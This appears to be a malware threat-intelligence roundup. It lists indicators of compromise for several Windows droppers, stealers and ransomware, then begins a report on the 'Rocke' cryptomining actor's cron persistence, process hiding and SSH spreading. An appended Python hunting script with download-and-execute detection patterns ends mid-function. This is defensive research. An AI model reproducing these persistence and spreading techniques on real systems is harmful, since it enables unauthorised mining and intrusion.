Win.Dropper.Delf-6652911-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • 3749282D282E1E80C56CAE5A
IP Addresses
  • 216[.]146[.]43[.]71
  • 103[.]63[.]2[.]227
Domain Names
  • checkip[.]dyndns[.]org
  • ajmanz[.]gq
Files and or directories created
  • %LocalAppData%\Temp\P8g.exe
  • %LocalAppData%\Temp\-1260536341.bat
File Hashes
  • 11392aee8e563b31a4dd14051611148e6ec0d03b2ebcceb37631f27e4bbfcd88
  • 12baa8549b752fb6446d498a6d9e1f1ca1b5cbefc97ae9902010a79d15165c6e
  • 23fd50159c2daee2a9495400a08c67e92378b287b6635e30efb18b4f16acbf74
  • 2b5f4ab8058a74d55a02d8cc6a0a8367263a1068472a2ad63092c2f1a8c825a0
  • 2f30c3be0665864ce736acfc093553cc5b0af50146688b0b783982a336ca95c0
  • 306a4a7a9a936a2e7aea01f9ae79e595aef2080abcf350a3c7ece41811509e84
  • 41192d3dd2635bcd40c92ff46913842b00ac28e5f3d743ea9c79328070ed52cb
  • 44114d762126e81487716a964ca2fe0d0fd0e4dba3dea72d619b0f4b32a26ead
  • 45c4d4333c17ad765dfa4094e7552e11434b09c4a4274431ceb04bdbb362eddc
  • 55ce8c73a62ccee965d023e48243d1f982c77d9fa9c34fd17f2893dd873681b0
  • 5f4db44965a523643ad99b7fa7d28221d124a2e2c8c4be8273208b5819db78a0
  • 6209350a55e20a0e38a65c0075c66f5e650926f9cce4ee31edb4f69aadaf5f11
  • 63b2702c9458be0c53ac24668116946a584b5a96fe9c3379d2477374dc2ae014
  • 76180cb564deace04d7c027d17c3297221d72abdd59dec55025507d92458076b
  • 8650fb73b188371b1ee7c009b03267c03c3870e673f10d273291ee670d006ccc
  • 89dbccfdb0048341d5b3ddb2af5bd8af2fff80a50799545c043bfbeee0d2fef5
  • 8f3aaf0ed0a63e6156ab338ebe95e607b779c4ef1d3f99b2a9bf4f1ac25cf857
  • a3be5e9da533c35fd20bdbc1a8c4f6821c6117f63f29c6f844a4af93e2bb5a16
  • a6d7fc06cbf14af546b91253b55951fea195716bd40196226510b4dfc4a3cf59
  • ab740b4fa20b8d8c27dfba02e04d6b4f772cd3b44aa2f1d4d1e3f76ea4631f29
  • c57e8eb0fa71df68e6f1f8b4274d1b87f33ad7fab2ea9c3c9b9cf1ef7b572dc6
  • d6ec082e1da8b63e3384bce47f2b058af2acd88526964db194ce794bc5830298
  • d99b29fdd8fc6cb24f408feeff49fdc50fdfe79aaad541947f291ce2505a16b8
  • e59d68db3399185b85bff7a0538fbf6d52a81783f9cfcd48a851be7a5d00e374
  • e91767a779860ae57b777a1e8b6c97022556c8b36c908bba99c5b68157abd46b

Coverage

Screenshots of Detection: AMP, ThreatGrid, Umbrella


Win.Malware.Generic-6652641-0


Indicators of Compromise


Registry Keys
  • <HKCU>\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
  • <HKCU>\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2
  • <HKLM>\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\
  • <HKLM>\SOFTWARE\Wow6432Node\Mozilla\Mozilla Thunderbird\
Mutexes
  • 91RB0O61SEBW01Fz
  • O51OB0RQTC73272z
IP Addresses
  • 255[.]255[.]255[.]255
  • 209[.]15[.]20[.]214
  • 217[.]70[.]184[.]50
  • 75[.]130[.]124[.]158
  • 205[.]178[.]189[.]131
  • 183[.]90[.]245[.]33
  • 52[.]204[.]47[.]183
  • 91[.]195[.]240[.]82
  • 195[.]201[.]179[.]80
  • 67[.]228[.]43[.]214
Domain Names
  • www[.]zexpar[.]com
  • www[.]themonkeygrindervintage[.]com
  • www[.]unsubchef[.]com
  • www[.]xn--vhq6e39ls7w[.]net
  • www[.]marryingmaldonado[.]com
  • www[.]shiqiyingli[.]com
  • www[.]mywdn[.]com
  • www[.]win[.]link
  • www[.]risu-nursery[.]com
  • www[.]sicknessfitness[.]com
  • www[.]saurabh[.]online
  • www[.]1113sophie[.]info
  • www[.]kacakbahisfirmasi[.]com
  • www[.]cryptocoindigital[.]com
  • www[.]41230319[.]net
Files and or directories created
  • %AppData%\O51OB0RQ\O51log.ini
  • %AppData%\O51OB0RQ\O51logim.jpeg
  • %AppData%\O51OB0RQ\O51logrv.ini
File Hashes
  • 01ff22b56231012c85e52d2b78024bd4b9c7bc33fc73bb3e2a83a5840911002f
  • 04f33361dc741051ae4b67475d747d8e4b60e0add47e0a2a03137a5423edf511
  • 09578c66fa6950eb62bd7d0890546a3640878a7347ebd986911dddd9f305b867
  • 0a4b87f413a8c8812977a80601790ecfa4429a4dc844db644a6716dce37f3240
  • 10909a5c51633fe85233e741ed870b43c01c497a16f28baec778586bd4a5e577
  • 149ef4c77df95084d134c13fa6a09b7695926fadf685cf3c8bf02946618125c1
  • 15de8d526570f470f010c7dd88d1863bef27f4c62fce08fcd82d1f6651577089
  • 163eda0df0d03eb61e15bf9e36339bb0bc76e587bcdb0aa8d6c747d039e93e29
  • 17bcfff4f3284163944c5a027a1fef4969d2f5f53dc7437bc3b4204c35de09ab
  • 1b0b85e1822dbd3db1b7e3459a5e0b00c195cb08f37b0ad814cc1f63aacf7252
  • 1e4f76adc700b02c55bd1c5a084356babb407f242dece68cf9ba5ebf61f1d508
  • 1fc76f62000f876b6994859ae31112b789851ff02750f621159ed18c303eec3e
  • 203e94abc7b9c527b65c2217c7e2105b429c8a3552e126d1eca91fff0e41ec8d
  • 22f482a7cee3ae84ef6e261f3cce4693534a58fd73d846b26870bf933ee80232
  • 2a49c01fdd02032dd24b7b1c1fcb9b3aa335d269e69fa8f2a4a4424b1f3079d0
  • 30580ba2618aa386ec975baf0b749d342c4ead3be18dd3d42dfbf7aab7321d0c
  • 306bea0dfa73d5f76beec04ae3ba1fe4457c343f758c181ca90f91344853560e
  • 34f40b1487afaa02bb6e0bc9c2ac5ceb0842acd09a3143a368f3c1959d9667fe
  • 38fecd8713e3914e745e751e9c6c5d62d8caef09c46ce4742f5583ce463b0d55
  • 3f00f59978a2af3e8f8076c4d33a626f8c4d26ef6a4bc7ae1c72544755fa5dd8
  • 407252416a323a0dc9435d8b418137c211892db049b6e1797e2f2f506f6d7145
  • 426a170dea0f17f430ec265efadeafad52afcf0355ebc5696259d155a48aef40
  • 4a29cce7f2f330b801afbd3f1490f786e0786dc651100eface068576e52bc948
  • 4e5249655b852066bb5f6213b638574625a7b60b2c6dfac3bb2e80ec9f72bc2d
  • 4f27d56cd4f2aad7b16d568a14fad510ba816319f14006b247b09ba2c6b5d881

Coverage

Screenshots of Detection: AMP, ThreatGrid, Umbrella


Win.Dropper.Generickdz-6652226-0


Indicators of Compromise


Registry Keys
  • <HKLM>\SYSTEM\CurrentControlSet\Services\VSS\Diag\Shadow Copy Optimization Writer
  • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value Name: 2951328147.exe
Mutexes
  • N/A
IP Addresses
  • 93[.]125[.]99[.]121
  • 94[.]231[.]109[.]239
  • 87[.]236[.]16[.]31
  • 80[.]77[.]123[.]23
  • 89[.]252[.]187[.]72
  • 87[.]236[.]16[.]29
  • 77[.]104[.]144[.]25
  • 87[.]236[.]19[.]51
  • 95[.]213[.]173[.]173
  • 87[.]236[.]16[.]208
Domain Names
  • www[.]lagouttedelixir[.]com
  • www[.]cakav[.]hu
  • www[.]mimid[.]cz
  • www[.]fabbfoundation[.]gm
  • relectrica[.]com[.]mx
  • topstockexpert[.]su
  • unnatimotors[.]in
  • vjccons[.]com[.]vn
  • royal[.]by
  • www[.]toflyaviacao[.]com[.]br
Files and or directories created
  • \$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$I9DT02V.lnk.id-98B68E3C.[backmydata@cock.li].bip
  • %UserProfile%\Desktop\KRAB-DECRYPT.txt
File Hashes
  • 03a05565633d1a7b916339b179d2998ba0f2391a5f804076eac1bdabd58073db
  • 0d25e78ac27d0ae33177d32ba505eb27b662e5b47eb349e3bc90ff4922912100
  • 17d8faad65cc55ba4145d3948f2d6d8af553a20863b8e31332390e0b264fe304
  • 19a55c08e9253b1cfb5e75ba0cc963006c4e121e6f0ae165b25c243c66f74971
  • 27ef40a53faad7f9d08ff2e8e2649f878a3965b4e5edaf052a6fd63c52fe3da6
  • 282482f92deecb3e6bb43aa72c39151bccc672907b4bd7e9afb51ded04ac949b
  • 28738ba1c8191f4d4119e651436f3ab9740ee22fea8a3b877a0c1f90a7744d93
  • 2bf26fe0f26585989ff9c23160867c05fbb817f6565266ce9faeda9291b4b89b
  • 344fa6fe96fba331c89ca98a6b739813370519355720670d5d468a49fd9191f9
  • 354f463a00be356335dfb1fd6d95f9888a2df87f2299a2ec78366ed983700294
  • 3f6fba76a23b0bd34b239cb66df5d491e2ea4a3c199dee39e5f3bd1b303f201e
  • 557e03989b74264f90a6e6e8843b7f1e2da369b83e571b31cb051fc19ec005ca
  • 565b34697c4d45072a94a442419110f80192ac7cd093a2d695e36505c6a38574
  • 81b55b7be0d97d2da88fc1bbb78300ed2dbded9785c8d66db42197b15707136b
  • 8b1bb0d2446648f30b9b4847816556fc5a4ca2c3636f612cdb76a5b75c23a00c
  • abcf13758ac9ae41a26efaa28431aab8fa704f34f13c629b47c87188ed75ea4b
  • b334e0410ccb3f5a27d39ba2f55a87f491a9c18ab9fd7b935d88a4702c7412e2
  • c73f8c3f7133426f096b19b3354d3a4512f193c74cf36fc57878c27b318a91b8
  • c96689d58b7f9978aea91266888a76d7887932b65a4a257fb8bc9095469a4415
  • cba59594fdd4ca6932d28404abc4b0b7b41f873a45f2d47ffe5292e81094a99f
  • d5c1c03969093df8ded59a8f030b52a6e0b50a16b72874edeb0b1afe1341a09f
  • f0dab3e88bce05940f6bab366953093efc1393e76d6390225da335f70f674743
  • f9b03b0475e4d75742e6404e2726fc418f1af36feeded66d0d6fa05cc1dc52ab

Coverage

Screenshots of Detection: AMP, ThreatGrid, Umbrella


Win.Dropper.Ponystealer-6652151-0


Indicators of Compromise


Registry Keys
  • <HKCU>\Software\Microsoft\Windows\CurrentVersion\RunOnce
Mutexes
  • N/A
IP Addresses
  • 45[.]76[.]142[.]81
Domain Names
  • salako[.]net
Files and or directories created
  • %LocalAppData%\Temp\Xazern\xauzcer.exe
  • %LocalAppData%\Temp\Xazern\xauzcer.vbs
File Hashes
  • 09dee688fc80457daa589b91ad03e7ba97f886f906fd6b0cfe3007871af29b95
  • 33be45cba28b09e3898172e85677970fa8be1efcdabf46b763e4d1e040cee857
  • 3671ae9c4921bd8dcd9d5e4cb3328615fbd50d6150e19b2ffa7c8d7d82d44840
  • 429f93e374501717c87819fb9da3438817f6bbb2f4078fe8b8f3bc39ce720998
  • 42bfe2c5da9a771a2aa3fd92e0ab8ad306d9469db287e223fb06a5b2f6411c9e
  • 4bf08911cf7b7111429f7e6cce41816b34098755a3b04ee74f1b4d3638f367d3
  • 6b814d2ce74af70810c0a462dfad452489862cd4aab1d51cec38b15b3e4e207a
  • 7aaed756dc1d45f2123909cde875ae3468b321235ae94034990b1f41e9ff6f70
  • adc247428e07b419c929f8483f99c062beddfdd172af7cdcd40176abd0c1a7ed
  • c376469a6e1e1c5bd0a455b2a3e0436d2cf8e2f9bf7a482726ad393ccc3945d3

Coverage

Screenshots of Detection: AMP, ThreatGrid, Umbrella


Win.Dropper.Zbot-6651705-0


Indicators of Compromise


Registry Keys
  • <HKCU>\Software\Microsoft\Windows\CurrentVersion\Run
  • <HKCU>\SOFTWARE\MICROSOFT\Loxu
Mutexes
  • {8EEEA37C-5CEF-11DD-9810-2A4256D89593}
IP Addresses
  • N/A
Domain Names
  • www[.]crossatlantictrades[.]info
Files and or directories created
  • %AppData%\Zyiv\opxoh.uzo
  • %AppData%\Ihvywo\ratib.exe
  • %LocalAppData%\Temp\tmpb488b983.bat
File Hashes
  • 1ba6b7755498310936c49e2b704d8aa5d22848d845aeecff0a7c680466ff6010
  • 3213b7273cec771dce3f249d069d955c71472e049c6d5471d7a1094ee48b03bc
  • 3eed5033e3d096b0430ddba825e5ab883e6277e1bb7b8d26fac512b508572830
  • 45f3c9a100dc1bef357158a3c648dabbb5002169b65c30e22d6cf84a622d7f2f
  • 523993e65033cbd402d4b7d5a460be0a91f83c7f849ecc2d594f77d3c6d7ec3f
  • 61a138b11a4720e5a48c4f9e7134cc812db28189d603fe2971a4f1c3af7bc94b
  • 860f2a54c4541c8c4f288223f586171bcf7bd34f516e2945ef2a677c422fb9ed
  • a27334fbd63647786367229c83fa4726f8accb19c9daa1585e6396fb010312d6
  • a4a5bcb01343e9597e6a2e683eb23f457c2c8136ed0a93f2e9d65629824458e0
  • b8db41e6dfffda29c0776b25c9ca1a9cd3e171fde6a940b269de942a121bb650

Coverage

Screenshots of Detection: AMP, ThreatGrid, Umbrella


PUA.Win.Adware.Ibryte-6651661-0


Indicators of Compromise


Registry Keys
  • <HKCU>\SOFTWARE\MICROSOFT\RAS AUTODIAL\Default
Mutexes
  • N/A
IP Addresses
  • 204[.]11[.]56[.]48
  • 185[.]53[.]179[.]7
Domain Names
  • imp[.]fusioninstall[.]com
  • downloadfastfree[.]com
  • install[.]oinstaller2[.]com
  • secure[.]oinstaller6[.]com
Files and or directories created
  • %LocalAppData%\Temp\nsy34B9.tmp\image.png
  • %LocalAppData%\Temp\nsy34B9.tmp\nsisdl.dll
File Hashes
  • 0cc4df786af790678de7d97a9f8b3219113b21f5bac09bb6c9bdae6f465f9bcd
  • 1897bf161100612c0d15e16b5b7dd80060fb91ee651346c80728ec83f01d7f45
  • 5bb6145d308cfd1996c3255f0e5939b74c7f252aff90d160ccb1e005254b20de
  • 5ee45058a8b7c48ef494003aa0f132d1c403ada040da8ca97ae004e57e1bb0cc
  • 608778c41ca1522c315889cf5e3c0f1c2f114c881f3254044740f2aa34461e11
  • 69ff0daad305242e0f30e431b7d3d717496a16ebdecd639c5deb42f504ac4fc6
  • 73f7c7ef6e2866b9647106ec68696e8e3c7d4a88dd3cd4f979894da25e3caa90
  • 861ea30e5b455525de47bf4818fe8b9a27aa05a494535feb999455b3c80390d8
  • 9c74e5e01edbafcfae16ceaa240138e50ff5e7d4ef81809cb052212c313ad781
  • cb79344e72e17249005a0087be94a84698604d9ba0ff394d56299b85d7f4818f

Coverage

Screenshots of Detection: AMP, ThreatGrid, Umbrella


Win.Dropper.Razy-6651608-0


Indicators of Compromise


Registry Keys
  • <HKLM>\Software\Wow6432Node\Microsoft\Tracing\RASAPI32
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • Value Name: Windows Update
Mutexes
  • N/A
IP Addresses
  • 104[.]16[.]16[.]96
  • 213[.]180[.]204[.]38
  • 217[.]66[.]226[.]116
  • 104[.]16[.]18[.]96
  • 104[.]16[.]19[.]96
  • 65[.]154[.]166[.]201
Domain Names
  • whatismyipaddress[.]com
  • smtp[.]yandex[.]com
  • ns7[.]hadara[.]ps
  • smtp[.]zoho[.]com
Files and or directories created
  • %AppData%\pid.txt
  • %AppData%\pidloc.txt
  • %LocalAppData%\Temp\holdermail.txt
  • %LocalAppData%\Temp\bhvDCAA.tmp
  • %LocalAppData%\Temp\holderwb.txt
  • %AppData%\WindowsUpdate.exe
File Hashes
  • 00ca8e4068f0759ef4e7828cbac93cc8e6768891c8c4cd8f6d642514464f8302
  • 16fc7578dae6e8014d5d074e13b2adde3fbd2553bbefee50202f5bf60e547fbd
  • 1b9d906012164cf39573d4f8651165742d02ee30ade241947f2917f533da345a
  • 232f90e65054b1d251a88b963dd9b05289657e6930b3770d8ff58636ff0e487e
  • 42ef9786694483987e92146817745bab9e56209cc35051f158c5ccc6bffa51b7
  • 4476a70d770a83f111902b7b0308dbb5cc749f747f2dcca1e1c9a2f0d884b2a0
  • 4bd8522ff7e8cf87a89667cf1e0b42a26889487c16fdc6abe69d0ac823e25b6a
  • 603487769c60730c697f30717b2093f84451557b251e2d187cdb1842e8db9d4e
  • 634f44b01ae79874f4b08ff130a6ab8a04fdd7196812a4300bb55039d56638ca
  • 63573bfd0e8c03f42b9194a77acb7da2765396ad4e9ec75b1b853a7245d58600
  • 735d19fbf1a9f8a34bcb445d204e51e854c1463072ac01149a8e67c08b97307d
  • 75af93db078e56bea18101170b02ce450a9e0216f2b8c3dcff23b83ba76f3a56
  • 760065e0657bfb7a952c199fe8a6f15a2bbd5843f1902a4d37c8411d7b9c9d9b
  • 777c42471101c9048be523cced54a807c56fab6504e0cc578f4934b4c56c4de9
  • 7d113888ef4821c893a078acd7d7e40bd44f150aa4b575987ee4fb802ce35224
  • 8fa0f87391d3ee93f16ae5c6a5ea116d2a67d0a2b5c60ed801e53e96aa9a32d8
  • a4bf29f13f50d6f4f0e0bfa95af5e89944d0297271b34b77b9a4c915e6ca2b55
  • c9dd220291b6542aa9ef92e2872f02de4c323c47f9b4e9730a1c97aab2e2c763
  • cfdb62ff82215a70edc66f5593cc06d2e0a0f3d842af5b726a95a5debb765176
  • d1dce43c9ff30383a0928cc2423a7370636088a8135c94f905ad37c7dae910aa
  • d2ddd1c35d5037984c0885dd411c64361f97738fa041590794e23f073bb1e0ab
  • e00e64c5b25507d7323653736da4cd9775816fea7bfd67f9532462b1ec531b32
  • eabe6d32b9e2ec97c2fe909e5d0f3a89f974c63dcc2ce43bce5a9c0121ca781e
  • f793a4aa08d82d3f3719a8fb376df98f2d2d8dc102af7a0d479bc479c26649a1

Coverage

Screenshots of Detection: AMP, ThreatGrid, Umbrella


Win.Dropper.Cloud-6651616-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • DENEK
IP Addresses
  • 204[.]95[.]99[.]176
Domain Names
  • spectrun2008[.]no-ip[.]org
  • joaosgk03[.]sytes[.]net
Files and or directories created
  • %LocalAppData%\Temp\Pa7Y5giSl017
  • %LocalAppData%\Temp\aut6F2A.tmp
File Hashes
  • 1497ef726ad9a29b9b64cf16c21fb5b80610e52683de177f9d9ece346788dfc0
  • 1dd1fc2ed544f68ba727ed4a02caf935e45ecfa86b02944fbd937680025f2379
  • 21ed019435f9541eafae5ef372ac33fdb1c967ecbbd17919d31f152bf858888f
  • 485e5121db35bec9dccc93580c470779c01bdad591df7c1d7a40473c0ffd6e73
  • 4b7aa109189b3f2738747216ba49d0bb4c9b97b44df3932ad1189b74dcb409c1
  • 557c69500e9cdecd65c402f309b414abc9777fe9fd36236eeaf9d533025f6e66
  • 58115870df165c7031e5304cba8e059366ae1ee935484f67154ccacf0eae62ee
  • a9427d85c27aea20ba8fdecd7d6dae561dc676dd2e106261e8108fcc4005ed97
  • c771d4c4de77633786c355722f784bac0665cd457ff19c6441ef99730b8d76f3
  • df0a6ff9574bb522ca340fd83a24cc096f1c3ea36b66097155862b71f4383c34
  • e4b90714b55aaa69027eaf3e0bf52a3f392aa09e3e4463744d5e8d3ed64837f7
  • f66dcfa6695042e6050dee3cea7948a80b217e8345919f6b90cef22f1ecddc4a
  • f9c5dcf920e1ba39fbe35cc7dc9dcabea6c6f67d533559c06664aa3665cd4bd4

Coverage

Screenshots of Detection: AMP, ThreatGrid, Umbrella


PUA.Win.Adware.Dotdo-6651541-0


Indicators of Compromise


Registry Keys
  • <HKLM>\Software\Microsoft\Tracing\po3v5cyhl_RASAPI32
  • <HKLM>\Software\Microsoft\Tracing\po3v5cyhl_RASMANCS
  • <HKLM>\Software\Microsoft\Tracing\3v5cyhl_RASMANCS
Mutexes
  • N/A
IP Addresses
  • 198[.]54[.]117[.]200
  • 52[.]205[.]106[.]49
  • 34[.]202[.]10[.]177
Domain Names
  • www[.]lubricantshaffey[.]win
  • s841[.]datarating[.]com
Files and or directories created
  • %LocalAppData%\Temp\nsnBDF8.tmp\sph9d7jl1.exe
  • %LocalAppData%\Temp\nsnBDF8.tmp\extss.txt
  • %LocalAppData%\Temp\nsnBDF8.tmp\po3v5cyhl.exe
  • %LocalAppData%\Temp\nsnBDF8.tmp\dsph9d7jl1.exe
File Hashes
  • 16aa5f4db1485896a6dfd2cef40a6243c0371a213c18d2832c7a9070b7e9002a
  • 434a7a324719c74ce3fa0dfd96bfdc14379ca8a0af954247320a1a76e80f995c
  • 70fd79d11821428a90b1c3869f846329af646e014887d72b1f4df531f8d33ab7
  • 8a4f468b126f0c309f5a64cd694a503aa7269d03372d3946e643005b30986475
  • 99ba03979407568ba6b1ed32184a043661608e039c9a3511c9a910a31dcd0ccf
  • 9adbf86b70ad8d487a1f67b4650b68b0dc03bdc84a7e84b1654fe8ff61a7cb88
  • b105d0c22989e4856995573a59ff1034ee6ef4ead24c2573ca688da4c94c60ee
  • cd18a0939f808496f5e05d3b996ed2a8d13dc94261ce329ac209ae086e7b9d5d
  • d399c525b8da116f8ab17333b78a88f20401ddd960405631e2cc52e7054bbcc4
  • da1842c44891d3ca1229ef8b8959edd4f974d21c700fec7ca64f3124a6493be4
  • dc7d530a26e005dd8766fd52c5d62c06c458a9018828a3ec4c8f80832ebae221
  • fae36f1c522c56bace27be915fd9e23748ec01ac9e87810348cbdfcf53a2a87b
  • fb388f3cd64b8a65db9584f1526eef8d4b876b5bc61c8674b4caf8bccf78a4e4

Coverage

Screenshots of Detection: AMP, ThreatGrid, Umbrella


Win.Dropper.Fareit-6651429-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • NMYQsgquQO
IP Addresses
  • 78[.]47[.]139[.]102
  • 212[.]112[.]245[.]170
  • 154[.]35[.]32[.]5
  • 193[.]23[.]244[.]244
  • 62[.]210[.]204[.]55
  • 185[.]106[.]154[.]118
  • 51[.]15[.]44[.]251
Domain Names
  • myexternalip[.]com
Files and or directories created
  • %AppData%\tor\lock
  • %AppData%\Microsoft\Windows\Start Menu\Programs\Startup\cc.exe.vbs
  • %AppData%\tor\cached-microdescs.new
  • %AppData%\tor\unverified-microdesc-consensus
File Hashes
  • 02c77b65bd25f4708f6b7f82b60689f3ace02639e4d262f172633e73f1e18071
  • 0587813e2d50a8bc2a3b6cca7749c3d134b51826ae7f13f832eeffc283306110
  • 06af72696ebe7994f9542af787dd5cb357b4348248c72038c7880fbeb67110be
  • 079f068987d7c53e2e47c39b89ca6f412a7a17e34992eaa33757aa99e29a47d8
  • 0ba6e0f83d3c3239cef5f30d2600c2e4d3e9b9ddb45a40cfbfcd86622a47b610
  • 0e12f2bc801777198026a86c920edac32b1eb874670730cf3f033a8e9fdba2b0
  • 13c96d7301e2b6bf3c9c9cde9199bbb538caee0ca068a9f54190af1f43059400
  • 16f755b71840a1e6c8de8a4bc6920cf2af1e8e821c2a77df2e3151dbba679a13
  • 195e09cca7a53e51250418e1c75157d5aab8269186dc68ba98fb5e934c2bc15c
  • 1b8e74fa84432c944ec2b239ab67abfac39b496a1e96dca7c0a7e92255457ecd
  • 1e53faedd0d111860b9eeabac7d61f0306c1d516fec0d11d043e83b361ab8e95
  • 202a7444df57d7f3846d3b58a2a887f28dc64d2727569af2255b26aa395ac441
  • 2128405a27110cf86a1f9f41ca06717ad3c9a2598302cdf19531932e51c4ece4
  • 222ad72cf417a849ec0d96199345cbe7340d3978d3c396dd45444f12ae8415e5
  • 22e4fde98af07c792e71e81a003f5472c868e5a05eb7c45c4eac9622d4c03345
  • 2623021afd3dca853fa09e36d31539ff55b9843cbec915dd64375ca31943ddca
  • 2666e5aae4ecb9ed923a4e16d5c9af953bd4a2082295df3724b7bf2697b36616
  • 27990924f27b7fc60db6fef7323ee841507f94c2fdd3bc27a446d537fb3989cc
  • 28083fe9ca79c1e20e4fc1f38cb8cdc7061bcef37e255bca5971e33feadb414f
  • 28bcac13100c3b048b9ce179f7896a729889af0b3461306f1f7d48f1baa3b212
  • 2b8825719d8001c42affc76b776d266aed8055cb40eced293632515f8841664d
  • 2d7a16ee5f9c2bfd89651b044accd40a49581bb5dd1ca8a58d46f986ea73be72
  • 2ff7012e08a2a95c39e56df2e0a5f8d9d6c82e1da218d89e35d4da770b8c6d54
  • 32ee9fdd809fc9e467f23b69bf961d9a79a5dae849219df99da1e443a621a015
  • 413f4a778b3edd7577b62165d567b2c438d1bbde941c0fe05875e775bd13ac4d

Coverage

Screenshots of Detection: AMP, ThreatGrid


Rocke: The Champion of Monero Miners


This post was authored by David Liebenberg.


Summary


Cryptocurrency miners are becoming an increasingly significant part of the threat landscape. These malicious miners steal CPU cycles from compromised devices to mine cryptocurrencies and bring in income for the threat actor.

In this post, we look at the activity of one particular threat actor: Rocke. We will examine several of Rocke's campaigns, malware, and infrastructure while uncovering more information about the actor. After months of research, we believe that Rocke is an actor that must be followed, as they continue to add new features to their malware and are actively exploring new attack vectors.

Introduction


Talos has written widely about the issue of cryptomining malware and how organizations should protect systems against this threat. We continue to actively research developments in this threat through research that includes monitoring criminal forums and deploying honeypot systems to attract these threats. It is through these intelligence sources that the Chinese-speaking actor which we refer to as "Rocke" came to our attention.

Rocke actively engages in distributing and executing cryptomining malware using a varied toolkit that includes Git repositories, HttpFileServers (HFS), and a myriad of different payloads, including shell scripts, JavaScript backdoors, as well as ELF and PE miners.

Early campaigns


This threat actor initially came to our attention in April 2018, leveraging both Western and Chinese Git repositories to deliver malware to honeypot systems vulnerable to an Apache Struts vulnerability.

Several files were downloaded to our Struts2 honeypot from the Chinese repository site gitee.com for a user named "c-999." Subsequently, the Gitee user page transitioned to "c-888." Around the same time, we observed similar activity pulling down files from a gitlab.com repository page for a user named "c-18."

The repositories on both Gitee and GitLab were identical. All the repositories had a folder called "ss" that contained 16 files. The files were a collection of ELF executables, shell scripts, and text files that execute a variety of actions, including achieving persistence and the execution of an illicit cryptocurrency miner.

Once the threat actor had compromised a system, they achieved persistence on the device by installing a cron job that downloads and executes a file "logo.jpg" from "3389[.]space." This file is a shell script which, in turn, downloads mining executables from the threat actor's Git repositories and saves them under the filename "java." The exact file downloaded depends on the victim's system architecture. Similarly, the system architecture determines if "h32" or "h64" is used to invoke "java."

Although we first observed this actor exploiting vulnerabilities in Apache Struts, we've also observed what we believe to be the same individual exploiting an Oracle WebLogic server vulnerability (CVE-2017-10271), as well as CVE-2017-3066, a critical Java deserialization vulnerability in the Adobe ColdFusion platform.

Recent campaign


In late July, we became aware that the same actor was engaged in another similar campaign. Through our investigation into this new campaign, we were able to uncover more details about the actor.

We observed a wget request from our Struts2 honeypot for a file named "0720.bin" located on 118[.]24[.]150[.]172:10555. We visited this IP and found it was an open HFS hosting "0720.bin" along with 10 additional files: "3307.bin," "a7," "bashf," "bashg," "config.json," "lowerv2.sh," "pools.txt," "r88.sh," "rootv2.sh" and "TermsHost.exe." We set about examining these files.


Screenshot of HFS system



We had previously observed this same IP scanning for TCP port 7001 throughout May 2018. This was potentially a scan for Oracle WebLogic servers, which listen on TCP port 7001 by default.

Both "0720.bin" and "3307.bin" are similar ELF files of similar size (84.19KB) that reach out to 118[.]24[.]150[.]172, and were marked clean in VirusTotal at the time of discovery. Morpheus Labs described a similar file that connects to the same IP address, which could open a shell on the victim's machine if a password-verified instruction was issued from the C2. In both our samples, as well as the ones that Morpheus Labs described, the hard-coded password was not only identical, but also located at the same offset.

Hard-coded password



"A7" is a shell script that kills a variety of processes related to other cryptomining malware (including those with names matching popular mining malware such as "cranberry," "yam," or "kworker"), as well as mining in general (such as "minerd" and "cryptonight"). It detects and uninstalls various Chinese antivirus products, and also downloads and extracts a tar.gz file from blog[.]sydwzl[.]cn, which also resolves to 118[.]24[.]150[.]172. The script downloads a project from GitHub called "libprocesshider," which hides a file called "x7" by registering a shared library through the dynamic linker's preload mechanism (LD_PRELOAD). The script looks for IP addresses in known_hosts and attempts to SSH into them, before downloading "a7" again from the actor's HFS at 118[.]24[.]150[.]172 and executing it.

Extract of Source Code of "a7"
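Two of the host-level behaviours described so far, the cron job in the earlier campaign that fetches and runs "logo.jpg" from 3389[.]space and the "a7" script's use of libprocesshider through the dynamic linker's preload file, leave artifacts a defender can check for. The following Python is an added example, not code from this post or from Talos, that scans crontab text for download-and-execute entries and scans /etc/ld.so.preload for libraries outside the system library directories. The crontab and preload contents are constructed to mirror the described behaviour, and the indicator set is taken from the hosts named in this post.

```python
"""Hunt for two Linux persistence and evasion artifacts: crontab entries that
download and execute remote content, and libraries registered for LD_PRELOAD
injection through /etc/ld.so.preload.  Added example; sample inputs are
constructed to mirror the behaviour described in the post."""
import re
from typing import Dict, List

# Hosts the post attributes to this actor (the post prints them defanged).
ROCKE_INDICATORS = {"3389.space", "sydwzl.cn", "blog.sydwzl.cn", "118.24.150.172"}

# A cron command is "download-and-execute" when it both fetches something...
FETCH_RE = re.compile(r"\b(curl|wget)\b")
# ...and pipes the result to a shell, runs it with sh, or marks it executable.
EXEC_RE = re.compile(r"\|\s*(?:ba)?sh\b|(?:^|[\s;&(])(?:ba)?sh\s+\S|\bchmod\s+\+?x\b")
HOST_RE = re.compile(r"https?://([A-Za-z0-9.\-]+)")

# System library directories; a preload entry anywhere else deserves a look.
TRUSTED_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/")


def refang(text: str) -> str:
    """Turn report-style defanged text (hxxp://3389[.]space) back into a real URL
    so the same scanner works on live crontabs and on pasted IOC lists."""
    return text.replace("[.]", ".").replace("hxxp", "http")


def cron_findings(crontab: str) -> List[Dict[str, object]]:
    """Return one record per crontab line that downloads and executes content,
    with the hosts it contacts and whether any host is a known indicator."""
    findings = []
    for raw in crontab.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if not (FETCH_RE.search(line) and EXEC_RE.search(line)):
            continue
        hosts = {h.lower() for h in HOST_RE.findall(refang(line))}
        findings.append({
            "line": line,
            "hosts": sorted(hosts),
            "known_indicator": bool(hosts & ROCKE_INDICATORS),
        })
    return findings


def preload_findings(ld_so_preload: str) -> List[str]:
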